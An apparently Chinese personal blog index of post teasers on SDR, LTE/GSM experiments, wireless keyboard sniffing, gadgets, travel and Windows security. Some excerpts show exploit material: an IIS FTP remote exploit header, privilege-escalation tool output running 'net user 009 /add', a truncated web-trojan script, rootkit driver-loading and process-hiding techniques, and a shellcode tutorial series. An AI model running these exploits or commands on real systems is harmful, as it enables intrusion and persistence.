2007年7月22日
摘要: srsLTE代码主要分为三个模块,即srsUE、srseNB、srsEPC,另外还包括一些底层的库函数:
srsUE:实现了物理层到IP层的LTE SDR平台;
srseNB:全协议栈的LTE eNodeB SDR平台;
srsEPC:轻量级的LTE核心网实现平台,包括HSS、MME以及S/P-GW;
lib:一套模块化的通用库,包括PHY、MAC、RLC、NAS、S1AP以及GW各层。
系统:ubuntu 16.04,使用实体机,USB3.0,千万不要用虚拟机,一些指令优化,时序。。。需要非常精准,比如双向验证鉴权的时候,差一点都不行。
软件无线电:bladeRF x40,LimeSDR mini,USRP B200
写卡:买白卡和写卡器,不要问我,自己关键字搜吧,taobao不让卖了
安装顺序:UHD,SoapySDR,SoapyUHD,LimeSuite,bladeRF,srsGUI,srsLTE
。。。
阅读全文
摘要:
一定会有人用这个关键字搜到这里的,
原来没打算写,网上搜索时候发现很多人深受苦恼,还是写一下吧。
背景就不解释了,此方法为下下策,能用武力解决的就尽量少哔哔。
。。。
阅读全文
摘要:
认证很简单,只需要在FF04的UUID中写入20字节的值并校验通过,就可以对手环进行读写指令控制。
其实有个更简单的,只要给Immediate Alert这个属性发送0x01或者0x02即可启动“女性娱乐模式”,不需要任何认证:
(这个属性本来是用来可穿戴设备的找回功能的)
...
阅读全文
摘要:
(U) Sniffing Proprietary 2.4GHz Signals
使用HackRF或者RTL-SDR加变频器,那是极好的,但是我最终需要把所有东西都打包到一个小空间里面。
。。。。。。
阅读全文
摘要:
翻译部分内容,备忘加巩固,好多不清楚或错误的地方,望高手指正。
extending the work of Thorsten Schröder and Max Moser
of the KeyKeriki v2.0 project.
NHBadge and a Keyboard。。。。。。
阅读全文
摘要:
阅读全文
摘要:
阅读全文
摘要:
备忘和参考
阅读全文
摘要:
国外官方是300美元左右,目前买不到,国内有做的,卖2800人民币,买不起。只能自己做了,好几个芯片好贵啊,都上百了。
阅读全文
摘要:
阅读全文
摘要:
支持手机(感觉可以把手机设置成MODEM模式支持AT命令的应该都可以)
- Samsung Galaxy S3 GT-I9300
- Samsung Galaxy Nexus GT-I9250 (has to be rooted!)
- Samsung Galaxy S2 GT-I9100
- Samsung Galaxy Note 2 GT-N7100
。。。。。。
阅读全文
摘要:
之前看过好多大牛玩osmocomBB项目,改个手机,连电脑,然后编译一堆东西,到最后都是开个console,满屏红红绿绿的文字滚动,看着很吊。
但都不说最终能干啥,滚屏完了就没了,大牛都太低调了,最近有朋友也在搞这个,了解了一下,以下描述都是我最近查阅的大量鸟文资料及少量中文资料之后的理解,如有误望指出。
OsmocomBB是国外一个开源项目,是GSM协议栈(Protocols stack)的开源实现,全称是Open source mobile communication Baseband.目的是要实现手机端从物理层(layer1)到layer3的三层实现。
这里记录一下过程,以便备忘和其它有需要的童鞋少走弯路。
........
阅读全文
摘要:
前段时间拆我的三星I9250,把音量排线弄断了,由于几乎看不到触点,修修补补好几个月了,时好时坏,有时候volume+或者volume-被粘滞住了,就无法开机了,重启直接进入recovery模式或者安全模式,但是之后无法响应任何键进入系统,还是得想办法彻底地修一下。。。。
阅读全文
摘要:
这小子,始终菊花跟脸同时对着我,算你狠。。。
。。。 阅读全文
摘要:
Raspberry Pi是一款基于Linux系统的个人电脑,配备一枚700MHz的处理器,256内存,支持SD卡和Ethernet,拥有两个USB接口,以及 HDMI和RCA输出支持。
有消息称,虽然Raspberry Pi看起来非常的迷你——只有一张信用卡大小,但是它能够运行像《雷神之锤三:竞技场》这样的游戏和进行1080p视频的播放。但是以这次接TFT屏试用结果看,我觉得至少SPI是纯属扯J8蛋,可能HDMI速度快点,但是就以那编译内核的速度来看,并不乐观。
... ...
阅读全文
摘要:
统一晒一下最近的图,时间先后顺序乱的
。。。。。。
阅读全文
摘要:
每次都重新推算一遍,年纪大了还是记录一下吧( 硬件版的TV-B-Gone的压缩编码跳过此段往下看)
N900上有个TVB-Gone的程序,但是程序的红外编码往往都是对应的国外的电视,好多国产电视都不支持,
有时候需要遥控空调或者投影之类的,只能自己录入了,大概看了一下,编码比较简单(比硬件那个简单多了,毕竟不需要考虑程序空间的问题)
(上次录过一次,这次又重搞一遍,还是记录一下,以备后用。)
。。。
阅读全文
摘要:
托rock的福,跟风败了个Raspberry Pi,(破手机照的,还可以吧 ^_^),安装配置如下:
阅读全文
摘要:
最近要破解一个软件的密码,发现用的我是007加密的,没错,软件就叫尼玛我是007,总结下方法:
……
阅读全文
摘要:
1、The installer needs to commit changes to partition tables, but cannot do so because partitions on the following mount points could not be unmounted: /cdrom
2、ubuntu installer crashed Missing filesystem.size
阅读全文
摘要:
半夜三更发blog,没人疼啊。
打算做个模拟USB键盘的东东,半夜睡不着,先搭个USB名片试试,效果还挺好的,可以整些恶作剧,多做几个可以送人,哈哈。
找现有的零件在面包板上测试的,所以不要评价外观:)
……
阅读全文
摘要:
之前做了个 27MHz的无线键盘监听,废了不少劲,一直想做个2.4GHz的,
国内买元器件和做PCB板子太麻烦,少了不做,又贵,中发电子城又远,懒得跑,每次跑一趟,总有忘了买的,
拖拖拉拉的一直到最近才终于折腾完。
Cortex-M3的资料很少,Jlink调试还不太会搞,不知道是不是那个山寨的Jlink问题。
……
阅读全文
摘要:
手工画的,打印的效果肯定会更好……
阅读全文
摘要:
中发的卖家真黑啊,15一个,我是懒得淘宝买,要了两个,JS肯定背地里窃喜。
用了一个半,接到一起,效果还不错。
严重感谢明月松溪的耐心指导,
严禁评价线圈外观
阅读全文
摘要: 芯片买了二批,都是坏的,都开始怀疑我对AVR的理解,甚至重买了个编程器,第三批芯片终于是好的。
结论是国内好多芯片都是假的,悲催啊
……
阅读全文
摘要:
一个国外的开源项目,通过截获无线键盘发出的信号,来监听键盘按键操作,第一个版本支持监听27MHz的无线键盘,第二个版本支持2.4G的无线键盘监听及注入功能,爽。
以前玩过C51单片机,加上本身自学能力和手工焊接功底不错,磕磕绊绊几个月下来,终于初步完成了这个小玩意。
这次的芯片是ATMEL的MEGA64A,比之前C51系列的又强大、复杂了不少,制作过程中遇到非常多的问题,在这里鄙视一下(强烈地)国内的知识共享精神
…………
阅读全文
摘要:
Neopwn:
http://www.neopwn.com/
BackTrack Mobile版,再解释一下,相当于一个黑客工具集的手机版,装完才发现,其实主要用到的就wl1251,一个支持注入的网卡驱动,其它的很多功能都是空的,或者不好用,稳定性不好,建议
……
阅读全文
摘要:
......
转眼过去多年时间多少离合悲欢
曾经志在四方少年羡慕南飞的燕
各自奔前程的身影匆匆渐行渐远
未来在哪里平凡啊谁给我答案
那时陪伴我的人啊你们如今在何方
我曾经爱过的人啊现在是什么模样
......
阅读全文
摘要:
用相机和手机拍的,几张白天拍的,几张晚上拍的,开始分辨率不对,调了下好多了,照片效果一般,实际效果比图片好很多。
……
阅读全文
摘要:
有时候下载115网盘的时候会提示“网络繁忙时段,非登陆用户其它下载地址暂时关闭。推荐您使用优蛋下载,没有优蛋?立即下载 ”
其实稍微修改下就可以解决。
……
阅读全文
摘要:
重装了N遍驱动,N遍Kmplayer,包括不同版本的,完美解码等,调试了无数回解码器,渲染器,分离器什么的,还是没有解决
最终发现是......
阅读全文
摘要:
主要工具:烙铁、钳子、铅笔刀(废了至少6把)、AB胶(至少2对)、砂纸、微型螺丝刀
主要材料:铅笔×112支(六边形最便宜那种)、棉签棍若干、烤肉签×1根、太阳能板、光控电路(废了一个)
附属工具:酌情购买创口帖(以本人神乎其技的刀hua也用了两三个,残念)
用时:没有好工具,而且空余时间构思加制作,花了4个月多点,之后零零散散做了些加工。
另:中间顺便去了趟乔家大院 & 平遥古城找找感觉
工具条件比较简陋,削斜面,切断之类都是用的铅笔刀,食指一侧都长茧了。
..........
阅读全文
摘要:
硬件需求:MC5725、小耳朵(天线)、EVDO资费卡、AN/AAA码、IMSI码
软件需求:T60BIOS2.22mod-1802 1804.iso、MC5725驱动、CDMA_Workshop_v2.7.rar、EVDO.prl、QPST_v2.7.rar、EVDO_Watcher.exe
WCDMA太贵,不考虑,移动的还早,现在比较流行的就是电信的EVDO,所以选定MC5725模块,而且还能GPS,由于国外都没有中国的机卡分离之说,所以需要把UIM卡的信息刷到模块上面,这个信息就是AN/AAA码和IMSI码,需要电信的内部人员提供,网上有些卖家能提供,不过现在好像越来越严了,估计以后很难拿到这些了。
如果需要发短信等普通手机功能,需要刷ESN码,还有鉴权什么的需要刷AKey,如果只是上3G,只要AN/AAA码和IMSI码即可。
以上是这几天翻阅海量帖子之后就我的理解,如有误人子弟的地方请指正。
拆机,安装硬件(之前换过不下5次液晶屏的灯管,此等级的拆机装机不费吹灰之力)
... 阅读全文
摘要:
绑定4444端口,Windows 2000 CN + SP4 测试通过,需要能建目录的用户,偏移地址若不通用,请自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
..................
阅读全文
摘要:
TRS 是英文Text Retrieval System(文本检索系统)的缩写,据说是全文检索、搜索引擎、内容管理及知识管理核心技术和产品的统一,入选2008年度国家规划布局内重点软件企业,做某些渗透经常会碰到。
......
阅读全文
摘要:
鸟文没太看明白,摸索了一下,$_FILE数组元素解析的问题。
搭个php的环境,目录在C:\www下,根目录下有个upload.php代码如下
......
阅读全文
摘要:
更新频度视出差频度而定
上海虹桥机场
京沪空中快线A8登机口
cheerway snack bar A8/.............
阅读全文
摘要:
这才是牛逼黑客,控制整栋大厦电力系统,大厦灯光来做背景,改编成游戏!坦克大战~~
.............
阅读全文
摘要:
测试成功,点打印后,会弹出计算器
.........
阅读全文
摘要:
26个字母,26个钢琴键(键盘请在关闭汉字输入法 然后点下上面的FLASH以获得焦点,才可正常使用),可以用a-z来弹,也可以用鼠标
下面的音乐,弹出来就知道是什么了
.........
阅读全文
摘要:
反正很老的机子了,刷坏了大不了买个新的
增加了如下功能:
1. 去网标,那个CMCC
2. 拍照可静音,上次上课拍老师的投影,安静的课堂上,咔嚓咔嚓很尴尬
3. 更新声音和摄像的驱动
4. 增加歌词秀功能(这个是我迫切需要的功能)
5. 增加来电秀功能(来电或者去电,显示对方的物理地址)
6. 字体变小,看着舒服一点
7. 比较酷的主题
8. 改walkman界面
9. 修改休眠模式显示时间的字体
10. 长按侧面的+按钮,开启或者关闭照明灯
11. 还有GPS功能,不实用,只显示两个十六进制字符串,冒号分割,不知道什么意思,难道是经度纬度?
12. 应该还有,忘了
下面看图
....................
阅读全文
摘要:
%tmp:~2,1%
稍微看了下,原来这个字符串是这个意思:%tmp:~2,1% = mid(%tmp%,2,1) = \
......
阅读全文
摘要:
某些地方画得有出入,被人一通鄙视
欢总一语道破:观察太少了
...........
阅读全文
摘要:
我的有啥补丁打啥补丁的Win2k3 CN SP1测试成功
d:\Churrasco.exe "net user 009 /add"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......
阅读全文
摘要:
“我的电脑黑屏了”
“我的电脑最近不知怎么变得很慢?“
“我上网老是自动弹出页面,怎么回事?”
“为什么杀毒软件老是弹出来,每次都是同一个病毒?”
.....................
任何人,我一般都会帮忙,但是长时间停留在这个问题上,会疯掉的,往往对方的描述不一定精确,光靠说,白白花了一天的时间也有可能搞不定一个小问题
也许有两种情况我会耐心的给你分析,1:领导,2:美女
我一般会说:“造成这种情况有149834种可能,重装吧,装完升级系统,打补丁,装杀毒,升级病毒库,不要装垃圾软件,不要上色情网站。”
下面讲讲一般步骤,以下讲的都是对付普通病毒,如果说驱动级,rootkit,bootkit什么的,要想让我用一篇简单的blog描述清楚恐怕不太现实,让你清理注入线程,SSDT之类的恶意程序就够你受的了。
................
阅读全文
摘要:
阅读全文
摘要:
080913 北京-八达岭高速-张家口-张北-宝昌镇(太仆寺旗)-桑根达来镇-乌日图塔拉苏木-锡林浩特-巴彦宝拉格苏木-阿尔善宝拉格镇-额和宝拉格苏木-乌里亚斯太镇(东乌珠穆沁旗)
080914 乌里亚斯太镇(东乌珠穆沁旗)-宝拉格苏木-巴彦霍布尔-额仁高毕苏木-满都胡宝拉格苏木-宝格达山林场-五岔沟镇-白狼镇-阿尔山市
080914 阿尔山游玩一天
080915 阿尔山-白狼镇-五岔沟镇-好仁苏木-科尔沁右翼前旗-突泉镇-科尔沁右翼中旗-高力板镇-舍伯吐镇-通辽-赤峰市
080916 赤峰市-承德市-北京
PS了一下,主要调了下颜色对比度等,裁剪了下尺寸,因为有的在车上拍的,画面中会有反光镜:),还有镜头上的水珠或者挡风玻璃上的虫子什么的,尽量PS掉了一些
..........
阅读全文
摘要:
写在文章开头的话:抑郁症严重者,切勿尝试以下操作
不要被标题误导了,不是直接一步升完,其实还是从6.10升到7.04再升7.10再升8.04再升8.10,相当漫长
(坚持6.10很久了,由于之前beryl特效是自己配置安装的,巨麻烦,一直舍不得升级)
.....................
阅读全文
摘要:
早上马拉松在家门口经过,下午去五棵松看女篮
十倍光学变焦,不是盖的,不过别人已经单反了
............
阅读全文
摘要:
http://www.midomi.com/,首页点上面的flash,Click and Sing or Hum
害我半夜翻箱倒柜找麦狼嚎,不过我唱的搜出来从来没对过,我确定是这套系统的识别率有问题,没错,确定一定以及肯定。
.........
阅读全文
摘要:
阅读全文
摘要:
(之前发的"关于Fs2You怎么才能不被和谐"的文章被和谐掉了)
装WordPress顺便看到的
默认plugins目录有hello.php文件,不过好像很多插........
阅读全文
摘要:
最近奥运了,地铁口变少了,开车单双号了,马路变窄了,物价上涨了,断奶一个礼拜了,股票下跌了,失业率上升了,社会动荡了,公司加班了,奖金不发了,关键是连烩面片都TMD开始放香菜了!
.........
阅读全文
摘要:
lcx给的,网上的都是放启动项,这个可以自动执行
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
.........
阅读全文
摘要:
今天找首歌,用kugoo,几百年不用,账号还在,提示自动升级,升完有个歌词的功能灰常不错,不像以前的歌词秀那种平均时间分配的显示歌词,而是类似卡拉OK的显示歌词方式,比较适合跑调王。不是非常精确,不过已经不错了。
一直用foobar,目前似乎还没有对应的插件。
......
阅读全文
摘要:
PS: 实在太经典,不得不转一下
献给所有的MGSER和游戏爱好者:
不论是作为psp平台上目前fami通评分最高的游戏(39分)来看,还是从完美承接了MGS3的剧情来看,合金装备-掌上行动都是一款不可多得的优秀作品。在旷世神作合金装备4即将发售之际,提前领略一下这个系列无与伦比的剧情魅力,也是我们献给每一个热爱该系列的玩家们小小礼物。
..............
阅读全文
摘要: 未测试,觉得比较鸡肋,能中的人实在太少了
阅读全文
摘要:
昨晚在吃饭的地方看了将近3小时电视(几乎不看电视,家里没电视),震憾,感人
太多太多太多感人的事迹,看着一幕幕画面,真有自己过去搬石头,帮忙出力的冲动,人家72小时不休息,大不了我48小时应该没问题,或者给人送个水什么的,能做什么就做什么。
给朋友打了个电话.......
阅读全文
摘要:
NESP第一个版本成功后,我就开始着手更加袖珍版本的改造,让我的NESP更容易携带。对于V3版本,我首先需要的是一块能够顺利运行NES游戏的主版NOAC,对比之前的版本,它的耗电量会更小。当然我不会保证所有NES游戏都能100%兼容,估计会有小部分NES游戏不能运行吧。
.......
阅读全文
摘要:
经过1个多月的使用时间,第一版本的NESP的缺陷就开始体现出来了。内部的一些保护油脂在我需要更换之前就失去作用了,还有其他的措施也没有起到预计的作用,主板最终还是被我的手汗侵蚀了。要是这种情况继续下去的话,按键部分的电路会彻底报销的。
............
阅读全文
摘要:
在一个黑暗的风雨交加之夜,一名疯狂的技师正操控着一台巨大的装置。他的手中拿着长长的木条,并等待适当的时机进行加工,工作间因为外面狂怒的闪电而充满白色的光芒。闪电再三击中建筑物,在被电弧缠绕的房间中,疯狂技师露出了魔鬼般的笑容。实验终于完结,把所有装置移除后,展现在我们面前的是:一个屏幕闪动着蓝光的盒子。
...............
阅读全文
摘要:
Windows的C++没有pthread_t类型,linux中有个pthread.h,很多站的VC代码,都不知道从哪包含来的,shit
网上看到有一个叫 POSIX Threads for Win32 的开源项目给出了一个功能比较完善的Windows下pthreads API的实现。
阅读全文
摘要:
本文的内容是 Win32 API(特别是进程、线程和共享内存服务)到 POWER 上 Linux 的映射。本文可以帮助您确定哪种映射服务最适合您的需要。作者向您详细介绍了他在移植 Win32 C/C++ 应用程序时遇到的 API 映射。
阅读全文
摘要:
刚去离我住的地方方圆二里地内最好的饭馆吃饭(叫音乐餐厅,这里所谓最好的是指:一个人吃饭价钱还能承受,味道可以,而且吃完还不会拉肚子),晚饭吃得早了点,因为晚上的火车,里面一个人都没有,除了服务员。坐下一四人小桌,服务员过来撤走三套餐具,留下一套离我最远的,在我对角的餐具,点了两个菜一个炒饭,
........
阅读全文
摘要: Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo 阅读全文
摘要:
RefControl 0.8.10
要是上次找到这个插件就好了,省得我一遍一遍地用nc修改referer提交
很多防盗链和防本地提交是依靠用户浏览器自动提交.......
阅读全文
摘要: 以下方法修改完后,再刷新本页就能看到上面图片
Firefox:输入about:config进入配置页面,修改network.http.sendRefererHeader的值为1即可(默认是2),
.....
阅读全文
摘要:
milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。
http://www.blogjava.net/Files/baicker/Real........
阅读全文
摘要: http://www.milw0rm.com/sploits/2008-zha0_ms08_014.rar
阅读全文
摘要:
貌似花了两小时
阅读全文
摘要: 开发人员兢兢业业搞研发、开源,商业公司却拿去申请专利
或许只是看了下面三行,您就忍不住想吐,那么麻烦坚持一下,如果可以的话顶一下日志我会感到万份荣幸
金山
删除FAT卷中文件的方法, 申请号:200610122249.5
彻底粉碎FAT卷中文件数据的方法, 申请号:200610122247.6
彻底粉碎NTFS卷中文件数据的方法, 申请号:200610122479.1
一种Windows平台下对抗API挂接的方法 http://www.cpsfu.com/G06F/2007/CN1936834.shtml
.............
阅读全文
摘要: 自从orale注入可以执行系统命令后,觉得oracle安全性实在太烂了,容易获得系统权限,又动不动就死翘翘
昨天给朋友做个渗透测试,稍微扫扫就死了
以前给客户做渗透测试也经常碰到过oracle死掉的问题
相比MSSQL,估计也就只有巨型数据查询速度快的优势了
阅读全文
摘要:
终于下完了众人期待的大作,PSP只用来看碟好几年了,今天终于拷个游戏玩玩
虽然还是拜托不了一个穿着性感的肌肉男,拿着怪异的兵器到处杀人(怪)的模式,不过画面和游戏性都是不错的说,操作非常爽快(但是我肯定没耐心玩完)
最近比较堕落,还有些公司的破事(好像谈到公司的事都是破事),没写什么技术性的文章也没看什么技术性的文章
阅读全文
摘要:
很多攒机的朋友都知道这个规律
品牌机为了吸引顾客,主要配件的配置会让你看着很高
为了降低成本,往往有某一个或者几个配件很“缺德”,要么杂牌,要么很低的配置
朋友一台式机,老抱怨慢,重装也不行,看分辩率高点的电影还顿,我问配置,答曰:CPU 2.50G 内存248M(估计256M)
朋友机器联想的
我就写明牌子了,咋的
阅读全文
摘要: javascript:window.setTimeout=null;showDirectDownload() 阅读全文
摘要: 老家的台式机坏了,好不容易修好了,也没啥用,就当“碟机”吧,重装系统,就装了个winrar和kmplayer
kmplayer播放某些avi文件的时候,对白小到几乎听不到,偶尔出现的背景音乐大到吓人,网上找了很多,准备按照步骤做,发现就没有提到的解码方式,我下的是kmplayer带所有解码包的版本,估计是没有注册。
在命令行到kmplayer的codecs目录,
执行如下命令:
........
阅读全文
摘要: 犁式(八字)第一次滑就会了,水平到了一定高度,就很难提升,哈哈,今天恨了下心,租了个教练学平行式的,顺便纠正了一下以前犁式的BUG
以下备忘,以便下次滑(说不定一年后),省得又花太多时间复习以前的技术
犁式:内八字(缓坡减速,刹车功效),重心在中间,左转重心在右脚,右转重心在左脚(惯性原理,总之重心在坡下那只脚,转弯外侧,如果你不是往坡上滑的话),板基本上水平(不是和破面平),刮雪才能起到减速作用,靠板立起的角度控制滑雪速度。
平行式:先从犁式开始,尽量使内侧的脚不受力(重心只在一条腿),能提起来,练习多次并逐渐提前抬脚的时间,直到你可以完全用一条滑雪板转弯,慢慢的收起来和另一只承重脚平行,如左拐,重心在右脚,左脚和右脚平行,要习惯双脚一高一低的感觉,用腿部的屈伸调解并保持正确的滑行姿势,转弯时尽量将外侧的膝盖置于另一只的后侧,方便下一次转换到直滑和转弯。
滑行过程中,重心前倾,小腿面和鞋梆之间要明显感觉到压力,重心稍低,双手前伸,保持平衡。挪板使之急停感觉应该是脚跟用力往坡下踩,使板横过来,高速下腿承受很大冲击力,得慢慢学习。
原地滑行:外八字 阅读全文
摘要: 总算是公德圆满
今年票贩子加价比票价还高,真是汗
有两张安检那里买的,可靠性没得说
...............
阅读全文
摘要: 要写个修改本地安全策略的工具,本以为修改注册表就行了,没想到还挺复杂,改策略,对应的注册表项会变,倒过来,改对应的注册表项,策略没变,郁闷
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account] |--------------------------------修改次数
"F"=hex:02,00,01,00,00,00,00,00,e0,7c,9e,21,1a,12,c6,01,43,00,00,00,00,00,00,\ 00 ~ 22
00,00,80,d2,16,47,b9,ff,ff,00,80,2c,ab,6d,fe,ff,ff,00,00,00,00,00,00,00,80,\ 23 ~ 47
00,cc,1d,cf,fb,ff,ff,ff,00,cc,1d,cf,fb,ff,ff,ff,00,00,00,00,00,00,00,00,f1,\ 48 ~ 72
03,00,00,00,00,00,00,02,00,18,00,00, 阅读全文
摘要: 任何网站,打开后(有图片的),浏览器输入
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
阅读全文
摘要: 网上找了N多资料,说得我晕头转向的,都是TMD资深顾问级别的文章,最后简单几步也可以搞定,过程如下:
我的SDK本来就是装好的,再装个DDK,就是重装系统,只要DDK目录还在,重新指定下即可,不用重装DDK
DDK目录为: f:\WINDDK\3790.1830
以下以HelloWorld为例
-----------------------------------------HelloWorld.h---------------------------------------------------
#ifndef __HELLOWORLD_H__
#define __HELLOWORLD_H__
#include
.................
阅读全文
摘要: 现在RK(rootkit)和ARK(anti- rootkit)的斗争已经进行了很久,在印象中最早出来的ARK工具是冰刃(IceSword),从冰刃开始出来到现在RK和ARK的斗争一直在继续,目前冰刃还是在流行当中,自己感觉也正是冰刃的出来才带动了当前流行的RK和ARK的斗争呵呵,现在很多病毒木马已经广泛的带有驱动,使用一些RK的技术和方法使自己更底层些更强大些,当前流行的ARK工具主要包括:隐藏进程检测,内核驱动检测,SSDT检测,代码HOOK检测,注册表隐藏的检测,隐藏文件的检测等一些功能的,下面谈谈自己对一些功能的简单愚见 嘻嘻。
..........
阅读全文
摘要: 方法一: 替换win32k.sys
在2k3的系统下ZwSetSystemInformation禁止了用户模式下加载驱动,只允许SMSS.exe加载win32k.sys。于是我们可以利用一下这个特点:
1. 注入SMSS.EXE
2. 打开SeLoadDriverPrivilege权限
3. 把原始的win32k.sys改名
4. 复制我们的驱动到\systemroot\system32下
5. 在SMSS.EXE中加载\\SystemRoot\\System32\\win32k.sys
6. 把\\SystemRoot\\System32\\win32k.sys改名
7. 把原始的win32k.sys文件改名改回去
..............
阅读全文
摘要: 一、蠕虫病毒具有自我复制能力
我们以普通的VB脚本为例来看看:
JavaScript代码
1. Set objFs=CreateObject ("Scripting.FileSystemObject")
2. '创建一个文件系统对象
3. objFs.CreateTextFile ("C:\virus.txt", 1)
4. '通过文件系统对象的方法创建了一个TXT文件。
.....................
阅读全文
摘要: 跟贴中看到已经有不少朋友成功的完成了前面的所有例题,今天我们在前面的基础上,继续深入。每一讲我都会引入一些新的知识和技术,但只有一点点,因为我希望在您读完贴之后就能立刻消化吸收,这是标准的循序渐进的案例式学习方法
另外在今天开始之前,我顺便说一下后面的教学计划:
我会再用3~4次的讲座来阐述shellcode技术,确保大家能够在比较简单的漏洞场景下实现通用、稳定的溢出利用程序(exploit)
..........
阅读全文
摘要: 麻雀虽小,五脏俱全
如果您顺利的学完了前面4讲的内容,并成功的完成了第2讲和第4讲中的实验,那么今天请跟我来一起挑战一下劫持有漏洞的进程,并向其植入恶意代码的实验,相信您成功完成这个实验后,学习的兴趣和自信心都会暴增。
开始之前,先简要的回答一下前几讲跟贴中提出的问题
代码编译少头文件问题:可能是个人习惯问题,哪怕几行长的程序我也会丢到project里去build,而不是用cl,所以没有注意细节。如果你们嫌麻烦,不如和我一样用project来build,应该没有问题的。否则的话,实验用的程序实在太简单了,这么一点小问题自己决绝吧。另外,看到几个同学说为了实验,专门恢复了古老的VC6.0,我也感动不已啊,呵呵。
...............
阅读全文
摘要: 上节课没有操练滴东西,不少蠢蠢欲动的同学肯定已经坐不住了。悟空,不要猴急,下面的两堂课都是实践课,用来在实践中深入体会上节课中的知识,并且很有趣味性哦
信息安全技术是一个对技术性要求极高的领域,除了扎实的计算机理论基础外、更重要的是优秀的动手实践能力。在我看来,不懂二进制就无从谈起安全技术。
缓冲区溢出的概念我若干年前已经了然于胸,不就是淹个返回地址把CPU指到缓冲区的shellcode去么。然而当我开始动手实践的时候,才发现实际中的情况远远比原理复杂。
................
阅读全文
摘要: 扫盲班第三讲开课啦!
上节课我们用越过数组边界的一个字节把邻接的标志变量修改成0,从而突破了密码验证程序。您实验成功了吗?没有的话回去做完实验在来听今天的课!
有几个同学反映编译器的问题,我还是建议用VC6.0,因为它build出来的PE最适合初学者领会概念。而且这门课动手很重要,基本上我的实验指导都是按VC6.0来写的,用别的build出来要是有点出入,实验不成功的话会损失学习积极性滴——实验获得的成就感是学习最好的动力。
............
阅读全文
摘要: 本想来点大道理申明下研究思路啥的,看到大家的热情期待,稍微调整一下讲课的顺序。从今天开始,将用3~4次给大家做一下栈溢出的扫盲。
栈溢出的文章网上还是有不少的(其实优秀的也就两三篇),原理也不难,读过基本上就能够明白是怎么回事。本次讲解将主要集中在动手调试方面,更加着重实践。
经过这3~4次的栈溢出扫盲,我们的目标是:
领会栈溢出攻击的基本原理
能够动手调试简易的栈溢出漏洞程序,并能够利用漏洞执行任意代码(最简易的shellcode)
.............
阅读全文
摘要: 您是否梦想过能够像电影上演的那样黑进任意一台机器远程操控?您的梦想是否曾经被书店里边满架子的反黑,防毒,擒木马的扫盲书强暴的体无完肤?
从今天开始,准备陆续发一系列关于软件漏洞方面基础知识的帖子,包括软件漏洞的研究价值,研究方法,堆栈利用的基础知识,shellcode的调试方法,漏洞调试方法,漏洞分析,漏洞挖掘,软件安全性测试等等,此外还将介绍一些metasploit架构和fuzz测试方面的入门知识。
软件漏洞分析,利用,发掘是当今安全技术界中流砥柱级别话题,如果您关注过black hat或者defcon之类的顶级安全技术峰会的话,就知道我不是在吹牛了。可惜的是这方面的中文资料很少,偶尔有一篇比较优秀的文章但又不够系统,目前为止也没有形成像破解技术这样的讨论风气,菜鸟们在黑灯瞎火的夜晚瞎折腾,没有交流和指导,兴趣就像被拔了气弥儿芯的车胎,很快就泄气了。
虽然漏洞分析与利用与破解在技术上各有侧重点,但逆向基础是共同的。以我个人的经验,能做crack的朋友只要稍加进修就能入门。就算没有任何汇编基础和逆向经验的朋友也不用担心,因为这 阅读全文
摘要: 通过hook ssdt中的ZwQuerySystemInformation来实现隐藏进程已经是很老的技术了。
qiweixue 在他的文章里面写的很清楚了:
http://bbs.pediy.com/showthread.php?t=36742&highlight=%E9%9A%90%E8%97%8F+%E8%97%8F%E8%BF%9B+%E8%BF%9B%E7%A8%8B
不过他的文章里面,进程名字是直接写死的,不能通过三层进行传递,而且得到ZwQuerySystemInformation是通过汇编的方法,这样在其他系统上可能会有问题,所以我做了一些改善如下:
1 通过应用程序将进程名字传递进来,可以传递多个进程名字,格式为:qq.exe;taskmgr.exe;
2 通用的方法来得到ZwQuerySystemInformation的地址,不过这个方法都是从rookit上得来的。
...........
阅读全文
摘要: 偶然发现OllyDBG.exe导出了一堆函数,这些函数都是供其插件调用的。对这种体系结构很感
兴趣,想弄清楚它的实现原理。后来又看到梁肇新的书《编程高手箴言》第278页提到的调用
门,觉得都应该差不多。
三种不同的解决办法(原理可能是一样的,:)):
1)在导出函数声明之前加上__declspec(dllexport)。例:
__declspec(dllexport) int Add(int a, int b);
__declspec(dllexport) int Sub(int a, int b);
__declspec(dllexport) int Mul(int a, int b);
__declspec(dllexport) int Div(int a, int b);
..........
阅读全文
摘要: icesword.exe 在执行的时候会放出一个驱动程序 ispubdrv.sys .
icesword.exe 装载 这个驱动,这个驱动安装后就不会卸载。直到系统重新启动。这可能是因为驱动中调用了
PsSetCreateThreadNotifyRoutine 函数.下面是这个函数在 ddk 中的介绍。
........
阅读全文
摘要: 一、为什么需要伪造内核:
IceSword(以下简称IS)为了防止一些关键系统函数(包括所有服务中断表中的函数以及IS驱动部分要使用到的一些关键函数)被 patch,它直接读取内核文件(以下简称“ntoskrnl.exe”),然后自己分析ntoskrnl.exe 的PE结构来获取关键系统函数的原始代码并且把当前内核中所有的关键系统函数还原为windows默认状态,这样保证了IS使用到的函数不被patch 过。也许你会想如果我们把还原后的函数再进行patch不还是能躲的过去吗?笔者也试过
.....................
阅读全文
摘要: [经典溢出攻击流程]
———————————
